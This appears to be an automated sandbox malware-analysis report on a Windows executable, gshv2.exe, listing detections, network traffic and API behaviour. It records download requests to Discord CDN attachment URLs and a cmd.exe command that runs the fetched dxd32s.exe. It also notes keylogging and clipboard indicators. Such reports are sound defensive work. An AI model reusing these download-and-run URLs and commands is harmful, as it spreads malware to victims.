Edit tour

Windows Analysis Report
gshv2.exe

Overview

General Information

Sample name:	gshv2.exe
Analysis ID:	1581356
MD5:	27f0e3dbf939ae14775e062a8445f0e5
SHA1:	502104b0540cf3a031c7d1aa3704946bdc253b72
SHA256:	7536d907def00cb0b8948d7651697a670d15b85545480931ea6de7f637ea4502
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Found API chain matching a thread downloading files from the Internet

Machine Learning detection for sample

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found large amount of non-executed APIs

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential key logger detected (key state polling based)

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

gshv2.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\gshv2.exe" MD5: 27F0E3DBF939AE14775E062A8445F0E5)

conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Suricata Signatures

ET MALWARE Possible Malicious Macro DL EXE Feb 2016

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T13:34:57.890716+0100	2022550	1	A Network Trojan was detected	192.168.2.4	49732	162.159.129.233	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: gshv2.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: gshv2.exe	Virustotal: Detection: 68%			Perma Link
Source: gshv2.exe	ReversingLabs: Detection: 54%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for sample

Source: gshv2.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: gshv2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Found API chain matching a thread downloading files from the Internet

Source: C:\Users\user\Desktop\gshv2.exe

Internet file download: CreateThread, URLDownloadToFile

graph_0-9267

Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.4:49732 -> 162.159.129.233:443

Source: global traffic	HTTP traffic detected: GET /attachments/1019415395452588092/1019417039519092736/dxd32s.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/926255566924447794/952693608832708628/chrome.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0CCFD0 URLDownloadToFileA,SleepEx,system,CreateThread,URLDownloadToFileW,CreateFileW,GetStdHandle,SetConsoleTextAttribute,SleepEx,exit,SetConsoleTitleA,GetLastError,FormatMessageA,GetStdHandle,SetConsoleTextAttribute,Sleep,system,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,

0_2_00007FF62C0CCFD0

Source: global traffic	HTTP traffic detected: GET /attachments/1019415395452588092/1019417039519092736/dxd32s.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/926255566924447794/952693608832708628/chrome.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000

Source: global traffic

DNS traffic detected: DNS query: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Dec 2024 12:34:57 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; path=/; expires=Fri, 27-Dec-24 13:04:57 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=898Eminxt%2FiRtRfKNZ0XB8iQQMwMXXeNfTrElGiP02RY0Pk5KuItFVq%2F59fSQZ1tuBf7SlklTFbCKo9LAMEQuiQuMEp%2BwclXz8Y4nl8Gm%2FxZfWy5D0g6WEiQeQKliF16bRY2tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f8959067fb780e2-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Dec 2024 12:35:05 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1C%2FZUX%2BBE3akSylxAb9CToCJGmDjyAU3CHzntD4QmbR9Ddx5Okl3Hm9ggR2YTwkNsVVVRFUPFKQJLjy4qD7ZsuDF1cjTWP7woS2MtP7beWmDTSc1PDL%2BkS7cOxeDXZRLwKLUzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpServer: cloudflareCF-RAY: 8f8959347bbb42ea-EWRalt-svc: h3=":443"; ma=86400

Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/L
Source: gshv2.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exe
Source: gshv2.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exeC:
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F5385B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exendowsF
Source: gshv2.exe, 00000000.00000003.1666174920.0000021F538E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exer
Source: gshv2.exe, gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp, gshv2.exe, 00000000.00000002.1759636616.0000021F538E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe.
Source: gshv2.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe03:21:08
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe11
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe:
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exer
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443

Source: unknown

HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0B1A40 _Init_thread_footer,free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_00007FF62C0B1A40

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0B1BB0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF62C0B1BB0

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0B1A40 _Init_thread_footer,free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_00007FF62C0B1A40

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0C73B0 GetAsyncKeyState,SleepEx,

0_2_00007FF62C0C73B0

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0C9F80 GetClientRect,QueryPerformanceCounter,GetKeyState,GetKeyState,GetKeyState,ClientToScreen,SetCursorPos,GetActiveWindow,GetCursorPos,ScreenToClient,GetCursorPos,

0_2_00007FF62C0C9F80

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0CCFD0: URLDownloadToFileA,SleepEx,system,CreateThread,URLDownloadToFileW,CreateFileW,GetStdHandle,SetConsoleTextAttribute,SleepEx,exit,SetConsoleTitleA,GetLastError,FormatMessageA,GetStdHandle,SetConsoleTextAttribute,Sleep,system,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,

0_2_00007FF62C0CCFD0

Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0CCFD0	0_2_00007FF62C0CCFD0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B4D50	0_2_00007FF62C0B4D50
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0AD570	0_2_00007FF62C0AD570
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0BFD60	0_2_00007FF62C0BFD60
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B9DD0	0_2_00007FF62C0B9DD0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B99D0	0_2_00007FF62C0B99D0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0AB622	0_2_00007FF62C0AB622
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B3650	0_2_00007FF62C0B3650
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B7650	0_2_00007FF62C0B7650
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0A2E50	0_2_00007FF62C0A2E50
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0AFA70	0_2_00007FF62C0AFA70
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0BEA90	0_2_00007FF62C0BEA90
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C66A0	0_2_00007FF62C0C66A0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C4B00	0_2_00007FF62C0C4B00
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0CE300	0_2_00007FF62C0CE300
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B9730	0_2_00007FF62C0B9730
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C5330	0_2_00007FF62C0C5330
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B8340	0_2_00007FF62C0B8340
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B5F70	0_2_00007FF62C0B5F70
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C9F80	0_2_00007FF62C0C9F80
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C43D0	0_2_00007FF62C0C43D0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C73E0	0_2_00007FF62C0C73E0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B0000	0_2_00007FF62C0B0000
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C0860	0_2_00007FF62C0C0860
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B7C80	0_2_00007FF62C0B7C80
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B9480	0_2_00007FF62C0B9480
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0C20B0	0_2_00007FF62C0C20B0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0B88D0	0_2_00007FF62C0B88D0
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0BC910	0_2_00007FF62C0BC910
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0BB930	0_2_00007FF62C0BB930

Source: classification engine

Classification label: mal68.winEXE@4/1@1/1

Source: C:\Users\user\Desktop\gshv2.exe

0_2_00007FF62C0CCFD0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_03

Source: gshv2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gshv2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gshv2.exe	Virustotal: Detection: 68%
Source: gshv2.exe	ReversingLabs: Detection: 54%

Source: unknown	Process created: C:\Users\user\Desktop\gshv2.exe "C:\Users\user\Desktop\gshv2.exe"
Source: C:\Users\user\Desktop\gshv2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gshv2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe
Source: C:\Users\user\Desktop\gshv2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe	Jump to behavior

Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\gshv2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ndfapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wdi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\gshv2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: gshv2.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: gshv2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: gshv2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: gshv2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: gshv2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gshv2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: gshv2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: gshv2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: gshv2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: gshv2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: gshv2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: gshv2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: gshv2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: gshv2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0A5E5D push rdi; retf 0002h		0_2_00007FF62C0A5E5E
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0AB462 push rdi; ret		0_2_00007FF62C0AB468

Source: C:\Users\user\Desktop\gshv2.exe

API coverage: 3.2 %

Source: gshv2.exe, 00000000.00000002.1759636616.0000021F538C2000.00000004.00000020.00020000.00000000.sdmp, gshv2.exe, 00000000.00000002.1759636616.0000021F5385B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0D00D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF62C0D00D0

Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0D027C SetUnhandledExceptionFilter,	0_2_00007FF62C0D027C
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0CFF4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF62C0CFF4C
Source: C:\Users\user\Desktop\gshv2.exe	Code function: 0_2_00007FF62C0D00D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF62C0D00D0

Source: C:\Users\user\Desktop\gshv2.exe

Code function: 0_2_00007FF62C0C73E0 mouse_event,mouse_event,mouse_event,

0_2_00007FF62C0C73E0

Source: C:\Users\user\Desktop\gshv2.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe

Jump to behavior

Source: C:\Users\user\Desktop\gshv2.exe

